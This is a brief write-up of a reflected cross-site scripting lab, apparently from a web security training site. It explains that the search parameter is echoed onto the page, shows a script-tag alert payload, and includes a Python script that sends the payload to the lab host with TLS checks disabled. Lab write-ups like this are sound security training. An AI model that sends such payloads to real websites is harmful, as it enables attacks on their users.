Cross Site Scripting (XSS) - Lab 01

The lab task is very basic. Starting the lab we get the following page which has search field. According to task description, it’s vulnerable.

Searching for anything, we see it’s sending data in search parameter in get request and the same data is displayed on the page. It means we can enter anything and it will be displayed (reflected) on the page.

So, we enter the javascript alert function in the script tag and it successfully triggered. Hence, lab solved.

Here’s my little python script, i wrote for solving lab automatically.

#!/usr/bin/env python3
import requests
import urllib3
import sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {
"http" : "http://127.0.0.1:8080",
"https" : "http://127.0.0.1:8080"
}
cookies = {
"session" : "sTpIlyI9fJ1VmZadmxaqWyUa941wRxkS"
}
#payload = sys.argv[2]
payload = '<script>alert();</script>'
# url = sys.argv[1]
url = "https://0afc00e90379e4c4c02d8eec00140003.web-security-academy.net/?search="
r = requests.get(url+payload, cookies=cookies, verify=False)
r = requests.get(url, cookies=cookies, verify=False)
if "Congratulations" in r.text:
print("[+] XSS Successfull!")